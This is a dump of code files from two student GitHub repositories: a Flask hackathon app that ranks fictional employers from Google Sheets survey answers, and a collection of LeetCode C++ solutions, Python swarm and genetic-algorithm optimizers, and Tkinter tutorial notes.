[ { "alpha_fraction": 0.7682926654815674, "alphanum_fraction": 0.7879924774169922, "avg_line_length": 70.06666564941406, "blob_id": "0e69934fe756ac489b7f952b8e820674f2df2f5c", "content_id": "8d370c385a69d31edc6ced24d410a53ca1383ebf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1066, "license_type": "no_license", "max_line_length": 256, "num_lines": 15, "path": "/README.md", "repo_name": "Terairk/WEconnect", "src_encoding": "UTF-8", "text": "# WEconnect\nThis is a project for the Brunei AI for Good Hackathon\n\nThe main code is in app.py\nFor those who are wondering, main.py and generatevalues.py are places where i tested the code separetly from the flask project then later added them into the flask thing. The client_secret.json file contains info to access the google spreadsheets via code.\n\nThe actual website link to the project being deployed onto a server is http://43.245.220.12:5000/\nThat's where you can test the website for yourself and see what it does.\n\nThe UI is a bit bad but I think you'll get the main point. The final part is where it ranks the companies from best to worst (fake companies mind you)\n\nHere's the link to the figma (the frontend mock up that looks much better than this)\nhttps://www.figma.com/proto/5MqnNJjrJ7MtPUCK0xZglq/Team-6-Prototype---Students?node-id=15%3A2&scaling=min-zoom\n\nAlso if you want to run this code for yourselves, you need to import nltk and do nltk.download() in your python installation. And of course download all the files in the requirements.txt file.\n" }, { "alpha_fraction": 0.6445690989494324, "alphanum_fraction": 0.6727434992790222, "avg_line_length": 36.53110122680664, "blob_id": "2ba13de95b928a637b77ca88cab2a75e5f8fb9e3", "content_id": "b5240ef37d784682acb00e7e4f0f7a62f4d2dcbf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7844, "license_type": "no_license", "max_line_length": 225, "num_lines": 209, "path": "/app.py", "repo_name": "Terairk/WEconnect", "src_encoding": "UTF-8", "text": "# copied from main.py which was used for testing\n\nimport gspread\nfrom oauth2client.service_account import ServiceAccountCredentials\nfrom nltk.corpus import wordnet as wn\nfrom PyDictionary import PyDictionary\n\ndictionary = PyDictionary()\n\n# Setting up the api's and their links\n# This project uses the google sheet api (which is connected to the google forms)\n# An adjective extractor library to extract adjectives from the extended response\n# This is done by nltk\n# Then we have the synonyms library to get synonyms for each adjective\n\n# Adjectives & Synonyms will be a multidimensional array, each sublist is each person's adjectives in their response\nadjectives = []\nsynonyms = []\n\n# Google sheets api set up\nscope = ['https://spreadsheets.google.com/feeds', \"https://www.googleapis.com/auth/drive\"]\ncreds = ServiceAccountCredentials.from_json_keyfile_name(\"client_secret.json\", scope)\nclient = gspread.authorize(creds)\nsheet = client.open(\"Students (Responses)\").sheet1\n\nperson = sheet.row_values(sheet.row_count)\n# for every response to the survey\nwords = person[11].split(\" \")\n\n# Whole thing checks if any words are adjectives and gets their synonyms\nfor w in words:\n if wn.synsets(w):\n\n tmp = wn.synsets(w)[0].pos()\n if tmp == \"a\":\n print(w, \":\", tmp)\n wSynonym = dictionary.synonym(w)\n synonyms += wSynonym\n\nprint(synonyms)\n\n# Start of employers lists\n# These are fake companies (some are based on real companies), you can tell from the names\n# Some of the subjects for some of the employers aren't super realistic, but others are\n# I just put in what came to mind for variety, Also locations are also fictional\n# A proper version would have actual employers with actual locations and what not\n# The values in the list are based on the spreadsheet questions\n# Values are randomised externally (not in the website for consistency) using random.org, so they're not real values\n\nemployer1 = [2020, \"computerland\", \"Belait\", True, [\"English\", \"History\", \"Business\", \"Computer Science\"], 1, 5, 6, 4, 6, True, ['honest', 'confident', 'adventurous', 'productive', 'original', 'courteous']]\nemployer2 = [2020, \"novideo\", \"Belait\", False, [\"Maths\", \"Computer Science\", \"Business\", \"Economics\", \"Physics\"], 2, 5, 10, 8, 10, False, ['positive', 'creative thinking', 'reliable', 'confident', 'agreeable', 'considerate']]\nemployer3 = [2020, \"ayyyymd\", \"Brunei-Muara\", False, [\"Maths\", \"Computer Science\", \"Business\", \"Economics\", \"Physics\"], 4, 10, 3, 3, 10, True, ['positive', 'honest', 'reliable', 'confident', 'agreeable', 'adventurous']]\nemployer4 = [2020, \"shintel\", \"Temburong\", False, [\"Maths\", \"Computer Science\", \"Business\", \"Economics\", \"Physics\"], 7, 4, 9, 10, 10, False, ['positive', 'reliable', 'confident', 'considerate', 'adventurous', 'original']]\nemployer5 = [2020, \"Bdope\", \"Tutong\", True, [\"Art\", \"Psychology\", \"Business\", \"Economics\"], 2, 8, 4, 4, 5, True, ['positive', 'honest', 'creative thinking', 'reliable', 'confident', 'agreeable']]\nemployer6 = [2020, \"Lavinci\", \"Brunei-Muara\", True, [\"Art\", \"English\", \"Psychology\", \"Economics\"], 7, 2, 2, 10, 10, True, ['positive', 'creative thinking', 'reliable', 'confident', 'agreeable', 'considerate']]\nemployer7 = [2020, \"yCircle\", \"Belait\", False, [\"Maths\", \"Physics\", \"Computer Science\"], 3, 7, 6, 2, 9, False, ['loyal', 'reliable', 'agreeable', 'considerate', 'enthusiastic', 'courteous']]\nemployer8 = [2020, \"Shell\", \"Brunei-Muara\", False, [\"Economics\", \"Business\", \"Geography\"], 6, 2, 1, 9, 10, True, ['positive', 'confident', 'agreeable', 'productive', 'fluent', 'sincere']]\nemployer9 = [2020, \"Pear\", \"Tutong\", True, [\"Computer Science\", \"Physics\", \"Business\"], 9, 3, 5, 2, 10, True, ['honest', 'confident', 'considerate', 'adventurous', 'productive', 'enthusiastic']]\nemployer10 = [2020, \"Wacdonalds\", \"Belait\", False, [\"Psychology\", \"English\", \"Geography\", \"Economics\", \"Drama\"], 10, 10, 1, 5, 10, True, ['honest', 'creative thinking', 'reliable', 'considerate', 'original', 'trustworthy']]\nemployer11 = [2020, \"WagyuQueen\", \"Belait\", False, [\"Psychology\", \"English\", \"Geography\", \"Economics\"], 1, 4, 8, 10, 3, False, ['positive', 'honest', 'confident', 'adventurous', 'considerate', 'productive']]\n\nemployers = []\nemployers.append(employer1)\nemployers.append(employer2)\nemployers.append(employer3)\nemployers.append(employer4)\nemployers.append(employer5)\nemployers.append(employer6)\nemployers.append(employer7)\nemployers.append(employer8)\nemployers.append(employer9)\nemployers.append(employer10)\nemployers.append(employer11)\n\n\nemployersWeightingScores = {}\nfor i in range(11):\n employersWeightingScores[i] = 0.1\n\n# Weighting Algorithm Part\n# There are some arbitary values that I've decided to use for the weight\n# like how location is worth 5 and virtual work is worth 2.\n# Also the higher the weight for the employers, the better\n# It's like the employers score\n\ni = 0\nfor employer in employers:\n weight = float(0)\n #Location\n userLocation = person[2]\n if userLocation == employer[2]:\n weight += 5\n\n #VirtualWork\n\n if person[3] == employer[3]:\n weight += 2\n\n #Subjects\n\n usersubjects = person[4].split(', ')\n for user_subject in usersubjects:\n for employer_subject in employer[4]:\n if user_subject == employer_subject:\n weight += 1.5\n\n #Teamwork skills\n\n # If an employer has a 2 for importance on teamwork, then it'll have a weight of 0.4 per point that the user has.\n # If an employer has a 9 for importance on teamwork, then it'll have a weight of 1.8 per point that the user has.\n # Ie it dictates how important the employer values teamwork and future skills\n weight += float(person[5]) * (float(employer[5]) * 0.1)\n\n #Creativity\n\n weight += float(person[6]) * (float(employer[6]) * 0.1)\n\n #Organization skills\n\n weight += float(person[7]) * (float(employer[7]) * 0.1)\n\n #Problem Solving Skills\n\n weight += float(person[8]) * (float(employer[8]) * 0.1)\n\n #General Computer Skills\n\n weight += float(person[9]) * (float(employer[9]) * 0.1)\n\n #Willingness to learn\n\n if person[10] == False and employer[10] == True:\n weight -= 3\n elif person[10] == True and employer[10] == True:\n weight += 3\n\n #Qualities\n for employerquality in employer[11]:\n for userquality in synonyms:\n if userquality == employerquality:\n weight += 0.5\n\n employersWeightingScores[i] = weight\n i += 1\n\nfinalList = []\n# sort employers weighting score\nsortedRankings = sorted(employersWeightingScores, key=employersWeightingScores.get)\nsortedRankings.reverse()\nfor i in range(11):\n employerName = employers[sortedRankings[i]][1]\n s = str(i+1) + \": \" + employerName\n print(s)\n finalList.append(s)\n\nfrom flask import Flask, render_template, url_for\napp = Flask(__name__)\n\nposts = [\n {\n \"author\": \"Ahmad Jamsari\",\n \"title\": \"Blog Post 1\",\n \"content\": \"First content\",\n \"date_posted\": \"April 20, 2018\"\n },\n {\n \"author\": \"Jane Doe\",\n \"title\": \"Blog Post 2\",\n \"content\": \"Second post content\",\n \"date_posted\": \"April 21, 2018\"\n }\n]\n\[email protected]('/')\[email protected](\"/home\")\ndef home():\n return render_template(\"home.html\", posts=posts)\n\n\[email protected]('/about')\ndef about():\n return render_template(\"about.html\", title=\"About\")\n\n\[email protected]('/login')\ndef login():\n return render_template(\"login.html\")\n\n\[email protected]('/register')\ndef register():\n return render_template(\"register.html\")\n\n\[email protected]('/employers')\ndef employer():\n return render_template(\"employer.html\")\n\n\[email protected]('/students')\ndef student():\n return render_template(\"students.html\")\n\[email protected]('/final')\ndef final():\n return render_template(\"final.html\", companies = finalList)\n\nif __name__ == '__main__':\n app.run()\n" }, { "alpha_fraction": 0.5, "alphanum_fraction": 0.692307710647583, "avg_line_length": 12.166666984558105, "blob_id": "059a8c35b50ba0941f8cde1eaec7acddb025b914", "content_id": "3ef17d42369bc1d914dd553cea5e6a88d0ab2b51", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 78, "license_type": "no_license", "max_line_length": 19, "num_lines": 6, "path": "/requirements.txt", "repo_name": "Terairk/WEconnect", "src_encoding": "UTF-8", "text": "Flask==1.1.2\n\ngspread~=3.6.0\noauth2client~=4.1.3\nnltk~=3.5\nPyDictionary~=2.0.1" }, { "alpha_fraction": 0.5957327485084534, "alphanum_fraction": 0.605277955532074, "avg_line_length": 31.290908813476562, "blob_id": "cee088ae713138195bc087b66f9f582ad4256569", "content_id": "4de0e0659fa30e7277f202f3017167d31a8c3413", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1781, "license_type": "no_license", "max_line_length": 109, "num_lines": 55, "path": "/generate_values.py", "repo_name": "Terairk/WEconnect", "src_encoding": "UTF-8", "text": "# This is a python file to generate the values for various employers\n# Manually inputting values from random.org is kinda a pain\n# Also manually inputting lots of qualities is also a pain\n# I had to manually input subjects and it was kind of a pain\n# So to save me from this pain, I'll create a whole new program\n# This might save me time, it might not, this file generates the values after the subjects for employer lists\n# Edit: It saved me time\n# Noticed that code isn't perfect as it could generate multiple of the same quality but that's fine\n\nfrom random import randint\n\n# Qualities that Employers want\nqualities = [\"friendly\", \"positive\", \"fluent\", \"confident\", \"honest\", \"humble\", \"courteous\", \"trustworthy\",\n \"honorable\", \"creative thinking\", \"original\", \"inventive\", \"productive\", \"adventurous\",\n \"agreeable\", \"ambitious\", \"bright\", \"considerate\", \"enthusiastic\", \"helpful\",\n \"loyal\", \"reliable\", \"sensible\", \"sincere\"]\n\n\n# Loop for each employer\nfor i in range(11):\n\n # Get the 5 values after the subjects\n for i in range(5):\n value = randint(1,10)\n print(value, end=\", \")\n\n # True or False\n willingnessToLearn = randint(0,1)\n toLearn = False\n if willingnessToLearn == 0:\n print(\"False\", end=\", \")\n else:\n print(\"True\", end=\", \")\n\n temp = []\n\n # Employer qualities\n print(\"[\", end=\"\")\n for i in range(20):\n value = randint(0, len(qualities) - 1)\n # fixes duplicates\n temp.append(qualities[value])\n temp = list(set(temp))\n s = \"'\" + temp[-1] + \"'\"\n\n\n for i in range(6):\n s = \"'\" + temp[i] + \"'\"\n if i == 5:\n print(s, end=\"\")\n else:\n print(s, end=\", \")\n\n print(\"]\", end=\"\")\n print()\n\n\n\n\n\n" } ]
4
MoMiJ1/Fungus
https://github.com/MoMiJ1/Fungus
34a1bfd7038da87a722bc155f7453656e1fc3168
e280984f84557c7ac48dd1bbcd848f08bb6d50f3
6966c91325bfdccbe3626368e53eea2e4e4edc63
refs/heads/master
2021-07-02T15:11:51.131692
2021-06-22T11:43:14
2021-06-22T11:43:14
237,172,413
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.3710247278213501, "alphanum_fraction": 0.3922261595726013, "avg_line_length": 18.285715103149414, "blob_id": "2186f1ff72ce5687b0765c71d891e6f0ae087af8", "content_id": "dc777ff39f21a6dca77b181805fa8f9d3ff8b206", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 572, "license_type": "no_license", "max_line_length": 46, "num_lines": 28, "path": "/leetcode/leetcode9.cpp", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\r\nusing namespace std;\r\n\r\n// LeetCode 9. 回文数\r\n\r\nclass Solution {\r\npublic:\r\n bool isPalindrome(int x) {\r\n queue<int> que;\r\n int count=0;\r\n long a=0;\r\n long b = x;\r\n if (x<0){\r\n return false;\r\n }\r\n while (x!=0){\r\n que.push(x%10);\r\n x = x/10;\r\n count++;\r\n }\r\n while (!que.empty()){\r\n a = a+que.front()*pow(10,--count);\r\n que.pop();\r\n }\r\n if (a-b == 0){ return true;}\r\n return false;\r\n }\r\n};" }, { "alpha_fraction": 0.4955357015132904, "alphanum_fraction": 0.5106026530265808, "avg_line_length": 36.12765884399414, "blob_id": "734ae03af3791214ec2d4cbe8a4d20f66bd569c1", "content_id": "e475f293153eda5c122349f803a4a047fad2c275", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3782, "license_type": "no_license", "max_line_length": 107, "num_lines": 94, "path": "/python/PSO.py", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "import numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\n# 计算函数 f(x,y) = 5cos(xy) + xy + y^3 的最小值\r\n# x ∈ [ -5, 5 ] y ∈ [-5,5 ]\r\n\r\n\r\nclass PSO:\r\n def __init__(self, iterTimes, groupSize, varNums, bound):\r\n '''\r\n :param iterTimes: 迭代次数\r\n :param groupSize: 解集大小\r\n :param varNums: 变量数量\r\n :param bound: 变量约束 [[x_min, y_min, z_min...] [x_max, y_max, z_max]]\r\n '''\r\n self.iterTimes = iterTimes\r\n self.groupSize = groupSize\r\n self.varNums = varNums\r\n self.bound = bound\r\n\r\n self.p_sites = np.zeros((self.groupSize, self.varNums))\r\n self.p_v = np.zeros((self.groupSize, self.varNums))\r\n self.p_optimal = np.zeros((self.groupSize, self.varNums))\r\n self.Optimal = np.zeros((1, self.varNums))\r\n self.alpha1, self.alpha2 = 1, 1\r\n self.weight = 0.5\r\n\r\n self.initialize()\r\n\r\n def initialize(self):\r\n temp_score = -1\r\n for i in range(self.groupSize):\r\n for j in range(self.varNums):\r\n # 1. 随机初始化粒子位置与速度\r\n self.p_sites[i][j] = np.random.uniform(self.bound[0][j], self.bound[1][j])\r\n self.p_v[i][j] = np.random.uniform(0, 1)\r\n # 2. 初始化粒子最好位置\r\n self.p_optimal[i] = self.p_sites[i]\r\n # 3. 评价当前粒子最好位置\r\n score = self.fitness(self.p_optimal[i])\r\n # 4. 更新全局最好位置\r\n if score > temp_score:\r\n self.Optimal = self.p_optimal[i]\r\n temp_score = score\r\n\r\n # 自定义函数\r\n def fitness(self, values):\r\n return (5 * np.cos(values[0] * values[1]) + values[0] * values[1] + pow(values[1], 3))\r\n\r\n # 更新位置与速度\r\n def update_params(self, group_size):\r\n for i in range(group_size):\r\n # 1. 更新速度\r\n self.p_v[i] = self.weight * self.p_v[i] + \\\r\n self.alpha1 * np.random.uniform(0, 1) * (self.p_optimal[i] - self.p_sites[i]) + \\\r\n self.alpha2 * np.random.uniform(0, 1) * (self.Optimal - self.p_sites[i])\r\n # 2. 更新位置\r\n self.p_sites[i] = self.p_sites[i] + self.p_v[i]\r\n # 3. 防止变量越界\r\n for j in range(self.varNums):\r\n if self.p_sites[i][j] < self.bound[0][j]:\r\n self.p_sites[i][j] = self.bound[0][j]\r\n if self.p_sites[i][j] > self.bound[1][j]:\r\n self.p_sites[i][j] = self.bound[1][j]\r\n # 4. 更新最优位置\r\n if self.fitness(self.p_sites[i]) > self.fitness(self.p_optimal[i]):\r\n self.p_optimal[i] = self.p_sites[i]\r\n if self.fitness(self.p_sites[i]) > self.fitness(self.Optimal):\r\n self.Optimal = self.p_sites[i]\r\n\r\n def run(self):\r\n scores = []\r\n self.tempOptimal = np.zeros((1, self.varNums))[0]\r\n for i in range(self.iterTimes):\r\n self.update_params(self.groupSize)\r\n scores.append(-self.fitness(self.Optimal))\r\n if self.fitness(self.Optimal) > self.fitness(self.tempOptimal):\r\n self.tempOptimal = self.Optimal.copy()\r\n print(f\"{i}代 : {-self.fitness(self.tempOptimal)} : {self.tempOptimal}\")\r\n self.display(scores)\r\n\r\n def display(self, data):\r\n plt.plot(range(self.iterTimes), data, color='lightcoral')\r\n plt.title(\"iteration - score\", color='r')\r\n plt.xlabel(\"iteration\")\r\n plt.ylabel(\"score\")\r\n plt.show()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n bound = [[-5, -5], [5, 5]]\r\n pso = PSO(iterTimes=50, groupSize=20, varNums=2, bound=bound)\r\n pso.run()\r\n" }, { "alpha_fraction": 0.41992881894111633, "alphanum_fraction": 0.43505337834358215, "avg_line_length": 20.078432083129883, "blob_id": "76e9803f12d0ccc83b06112a315247da113a2d49", "content_id": "20907660afc4e8e9a8ad1077af2a112044c992af", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1156, "license_type": "no_license", "max_line_length": 55, "num_lines": 51, "path": "/leetcode/leetcode26_27_28.cpp", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\r\nusing namespace std;\r\n\r\n// LeetCode 26.删除有序数组的重复项\r\n\r\nclass Solution {\r\npublic:\r\n int removeDuplicates(vector<int>& nums) {\r\n int i = 0;\r\n for (int j = 1; j < nums.size(); j++) {\r\n if (nums[j] == nums[j-1]){\r\n j--;\r\n nums.erase(nums.begin()+j);\r\n }\r\n }\r\n int k = nums.size();\r\n return k;\r\n }\r\n};\r\n\r\n// LeetCode 27.移除元素\r\n\r\nclass Solution {\r\npublic:\r\n int removeElement(vector<int>& nums, int val) {\r\n int k = 0;\r\n for(int i = 0;i<nums.size();i++){\r\n if(nums[i]!=val){\r\n nums[k++] = nums[i];\r\n }\r\n }\r\n return k;\r\n }\r\n};\r\n\r\n// LeetCode 28.实现strstr\r\n\r\nclass Solution {\r\npublic:\r\n int strStr(string haystack, string needle) {\r\n if (needle.empty()) {return 0;}\r\n int l = needle.size();\r\n if (l > haystack.size()){return -1;}\r\n for (int i = 0; i < haystack.size()-l+1; i++) {\r\n if (haystack.compare(i,l,needle)==0) {\r\n return i;\r\n }\r\n }\r\n return -1;\r\n }\r\n};" }, { "alpha_fraction": 0.4502212405204773, "alphanum_fraction": 0.49668142199516296, "avg_line_length": 32.846153259277344, "blob_id": "28f99fe7a74016f29c0e93d4ef24528287f799ec", "content_id": "8eb6626bf652fbce216bb0b7a5c750f0e5bf0b7c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 914, "license_type": "no_license", "max_line_length": 65, "num_lines": 26, "path": "/leetcode/leetcode539.cpp", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\r\nusing namespace std;\r\n# define DAY 1440\r\n\r\n// LeetCode 539.最小时间差\r\n\r\nclass Solution {\r\npublic:\r\n int findMinDifference(vector<string>& timePoints) {\r\n sort(timePoints.begin(),timePoints.end());\r\n int res = 1440;\r\n for(int i = 0; i < timePoints.size()-1; i++){\r\n int h1 = atoi(timePoints[i].substr(0,2).c_str());\r\n int m1 = atoi(timePoints[i].substr(3,2).c_str());\r\n for(int j = i + 1; j < timePoints.size(); j++){\r\n if(timePoints[i] == timePoints[j]) return 0;\r\n int h2 = atoi(timePoints[j].substr(0,2).c_str());\r\n int m2 = atoi(timePoints[j].substr(3,2).c_str());\r\n int tmp1 = abs(h2*60+m2-h1*60-m1);\r\n int tmp2 = DAY - tmp1;\r\n if(min(tmp1,tmp2) < res) res = min(tmp1,tmp2);\r\n }\r\n }\r\n return res;\r\n }\r\n};" }, { "alpha_fraction": 0.5071805119514465, "alphanum_fraction": 0.5268133282661438, "avg_line_length": 29.4228572845459, "blob_id": "64c82c35ccba02240b1b234bc00b13f70667f829", "content_id": "fa69bc1e5fc7ede17d5819e61ddeb4e151823e1a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6269, "license_type": "no_license", "max_line_length": 107, "num_lines": 175, "path": "/python/gui.py", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "import sys\r\nif sys.version_info.major < 3:\r\n import Tkinter\r\nelse:\r\n import tkinter as Tkinter\r\n\r\n\r\n'''\r\n 【基本控件】\r\n 1. Radiobutton(root, text, variable, value)\r\n :param root: Tk\r\n :param text: 选项的文本\r\n :param variable: 绑定选择的变量\r\n :param value: 该选项对应的值\r\n\r\n 2. Button(root, text, command)\r\n :param root: Tk\r\n :param text: 选项的文本\r\n :param command: 点击时调用的函数\r\n\r\n 3. Checkbutton(root, text, variable)\r\n :param root: Tk\r\n :param text: 选项的文本\r\n :param variable: 绑定选择变量\r\n\r\n 4. Scale(root, label, length, from_, to, resolution, variable, orient)\r\n :param root: Tk\r\n :param label: 显示的名称\r\n :param length: 滑块长度\r\n :param from_: 左边界\r\n :param to: 右边界\r\n :param resolution: 步长\r\n :param variable: 绑定选择变量\r\n :param orient: 滑动方向\r\n \r\n 5. Label(root, text, textvariable, font, justify, foreground, underline, anchor, width, height, bg)\r\n :param text: 静态文本\r\n :param textvariable: 动态文本\r\n :param font: 字体,格式为一个tuple (font_name, font_size)\r\n :param justify: 对齐方式,有:['center','left','right']\r\n :param foreground: 文本颜色\r\n :param underline: 单个字符添加下划线,传入值为目标字符串的索引\r\n :param anchor: 位置,可选(n,s,w,e,ne,nw,sw,se,center),eswn对应东南西北\r\n \r\n 6. grid(row, column)\r\n :param row: 控件所在的行位置\r\n :param column:控件所在的列位置 \r\n'''\r\ndef basic_widget(method=\"pack\"):\r\n def initUI(name='gui', size='900x600'):\r\n root = Tkinter.Tk()\r\n root.title(name)\r\n root.geometry(size)\r\n return root\r\n\r\n def click(i):\r\n if i == 1:\r\n print('选择:', choose_list[choose.get()])\r\n elif i == 2:\r\n selects = []\r\n for k, v in abcd.items():\r\n if v.get(): selects.append(k)\r\n print(\"选择:\", selects)\r\n elif i == 3:\r\n print(factor.get())\r\n\r\n\r\n if __name__ == \"__main__\":\r\n root = initUI()\r\n\r\n # 单选\r\n choose_list = ['A', 'B', 'C', 'D']\r\n choose = Tkinter.IntVar()\r\n choose.set(0)\r\n for i, val in enumerate(choose_list):\r\n Tkinter.Radiobutton(root, text=val, variable=choose, value=i).pack()\r\n Tkinter.Button(root, text=\"单选\", command=click(1)).pack()\r\n\r\n # 复选\r\n a, b, c, d = Tkinter.BooleanVar(), Tkinter.BooleanVar(), Tkinter.BooleanVar(), Tkinter.BooleanVar()\r\n abcd = {'A': a, 'B': b, 'C': c, 'D': d}\r\n for k, v in abcd.items():\r\n v.set(0)\r\n Tkinter.Checkbutton(root, text=k, variable=v).pack()\r\n Tkinter.Button(root, text=\"复选\", command=click(2)).pack()\r\n\r\n # 滑块\r\n factor = Tkinter.DoubleVar()\r\n factor.set(0.800)\r\n Tkinter.Scale(root, label='滑块', length=200, from_=0., to=1.0, resolution=0.001,\r\n variable=factor, orient=Tkinter.HORIZONTAL).pack()\r\n Tkinter.Button(root, text='输出', command=click(3)).pack()\r\n\r\n # 文本显示\r\n text = Tkinter.StringVar()\r\n text.set(\"This is a text;这是个文本。\")\r\n label = Tkinter.Label(root,textvariable=text,font=('宋体',15),foreground='black',\r\n underline=3,anchor='nw',width=30,height=2,bg='white')\r\n\r\n # 文本输入\r\n e = Tkinter.Entry(root)\r\n e.pack()\r\n Tkinter.Button(root, text=\"修改\").pack()\r\n\r\n root.mainloop()\r\n\r\n\r\n\r\n'''\r\n 【画布】\r\n 1. Canvas(root, bg, width, height)\r\n :param root: Tk\r\n :param bg: 画布背景颜色\r\n :param width: 画布宽\r\n :param heigth: 画布高\r\n \r\n 2. create_line(point, arrow, arrowshape, dash, width)\r\n :param point: 要连线的点的坐标\r\n :param arrow: 箭头,first--箭头在起始点,last--箭头在目标点,both--双箭头\r\n :param arrowshape: 箭头大小,传入一个tuple,如--(3,4,5)\r\n :param dash: 是否绘制虚线,默认False\r\n :param width: 线的宽度\r\n :param tags: 标签\r\n \r\n 3. create_oval(point, fill, outline, width)\r\n :param point: 椭圆的外接矩形的左上角和右下角坐标\r\n :param fill: 内部填充颜色\r\n :param outline: 边颜色\r\n :param width: 边宽\r\n :param tags: 标签\r\n \r\n 4. create_text(point, text, font)\r\n :param point: 文字所在点\r\n :param text: 文本内容\r\n :param font: 使用字体,传入tuple,如:(\"宋体\",12)\r\n \r\n 5. bind(event, handler)\r\n :param event: \r\n 常用的:\r\n (1) 26个字母,如: 'n','s'等,直接按键盘对应的键就可\r\n (2) <Button-1>:鼠标左键点击, <Button-3>: 右键点击\r\n <Button-4>: 向上滚轮, <Button-5>: 向下滚轮\r\n <Double-Button-1>: 左键双击,右键同理\r\n (3) <Return>:回车;<BackSpace>:删除;<Escape>:esc\r\n <Left>,<Up>,<Right>,<Down>: 方向键\r\n :param handler: event发生后的操作,可以是一个函数\r\n'''\r\n# 画布\r\ndef tk_canvas():\r\n def initUI(name='windows', size='900x600', width=900, height=500, bg='white'):\r\n root = Tkinter.Tk()\r\n root.geometry(size)\r\n root.title(name)\r\n cv = Tkinter.Canvas(root, bg=bg, width=width, height=height)\r\n return root,cv\r\n\r\n\r\n if __name__ == \"__main__\":\r\n root,cv = initUI()\r\n p1 = [[100,100],[300,200]]\r\n\r\n cv.create_line(p1,arrow=\"first\",arrowshape=(7,7,7),dash=True,width=5,tags=\"line\")\r\n cv.create_oval(p1,outline='blue',fill=\"pink\",width=10,tags=\"oval\")\r\n cv.create_text((400,300),text=\"hello\",font=(\"source code pro\",12))\r\n cv.grid(row=0)\r\n\r\n Tkinter.Button(root,text=\"btn1\").grid(row=1,column=0)\r\n Tkinter.Button(root,text=\"btn2\").grid(row=2)\r\n\r\n root.mainloop()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n basic_widget()\r\n tk_canvas()\r\n\r\n" }, { "alpha_fraction": 0.44222721457481384, "alphanum_fraction": 0.4641132950782776, "avg_line_length": 30.705263137817383, "blob_id": "a7923267a9f81a50749fd9b4cc97f50ffef35e3b", "content_id": "102b08a78297878655185913bdac578b8503dd51", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3261, "license_type": "no_license", "max_line_length": 119, "num_lines": 95, "path": "/python/GA_simple.py", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport random\r\n\r\n\r\nclass GA_extremum:\r\n\r\n # 求解 x*sin(2x)*e^(-0.5x) 在 0<=x<=1 时的最大值\r\n # 使用浮点数编码\r\n\r\n def __init__(self, M_Size, T, Pc, Pm, bound_min, bound_max):\r\n '''\r\n :param M_Size: 种群数量\r\n :param T: 遗传代数\r\n :param Pc: 交叉概率\r\n :param Pm: 变异概率\r\n :param bound_min: 搜素上届\r\n :param bound_max: 搜索下界\r\n '''\r\n self.M_Size = M_Size\r\n self.T = T\r\n self.Pc = Pc\r\n self.Pm = Pm\r\n self.bound_min = bound_min\r\n self.bound_max = bound_max\r\n\r\n self.Optimal = [0, 0]\r\n\r\n # 随机生成初始解\r\n def initM(self):\r\n return [np.random.uniform(self.bound_min, self.bound_max) for i in range(self.M_Size)]\r\n\r\n # 目标函数\r\n def myfunc(self, x):\r\n return x * np.sin(2 * x) * np.exp(-0.5 * x)\r\n\r\n # 适应度函数\r\n def fitness(self, M):\r\n return [self.myfunc(M[i]) for i in range(self.M_Size)]\r\n\r\n # 选择: 最优保存选择\r\n def select(self, fitness, M):\r\n if np.max(fitness) > self.Optimal[1]:\r\n self.Optimal = [M[np.argmax(fitness)], np.max(fitness)]\r\n fitness[np.argmin(fitness)] = self.Optimal[1]\r\n M[np.argmin(fitness)] = M[np.argmax(fitness)]\r\n return fitness, M\r\n\r\n # 算术交叉\r\n def cross(self, M):\r\n s = []\r\n for i in range(self.M_Size // 2):\r\n if np.random.random() < self.Pc:\r\n x1 = np.random.randint(0, self.M_Size)\r\n while x1 in s:\r\n x1 = np.random.randint(0, self.M_Size)\r\n x2 = np.random.randint(0, self.M_Size)\r\n while x2 in s:\r\n x2 = np.random.randint(0, self.M_Size)\r\n s.append(x2)\r\n a, b = M[x1], M[x2]\r\n alpha = np.random.uniform(0, 0.05)\r\n M[x1] = sorted([np.random.choice([-1, 1]) * alpha * b + (1 - alpha) * a, 0, 1])[1]\r\n M[x2] = sorted([np.random.choice([-1, 1]) * alpha * a + (1 - alpha) * b, 0, 1])[1]\r\n return M\r\n\r\n # 变异\r\n def mutation(self, M, t):\r\n if t < 0.8 * self.T:\r\n for i in range(self.M_Size):\r\n if np.random.random() < self.Pm:\r\n M[i] = np.random.uniform(self.bound_min, self.bound_max)\r\n else:\r\n for i in range(self.M_Size):\r\n if np.random.random() < self.Pm:\r\n M[i] = sorted([M[i] + np.random.choice([-1, 1]) * random.gauss(\r\n (self.bound_min + self.bound_max) / 2, 2 * (self.bound_max - self.bound_min) / self.M_Size), 0,\r\n 1])[1]\r\n return M\r\n\r\n def run(self):\r\n M = self.initM()\r\n t = 1\r\n while t <= self.T:\r\n fitness = self.fitness(M)\r\n fitness, M = self.select(fitness, M)\r\n M = self.cross(M)\r\n M = self.mutation(M, t)\r\n t += 1\r\n\r\n\r\nif __name__ == \"__main__\":\r\n ga = GA_extremum(M_Size=40, T=50, Pm=0.05, Pc=0.5, bound_min=0, bound_max=1)\r\n res = ga.run()\r\n print(\"最优解为:x={}\\n极值:{}\".format(res[0], 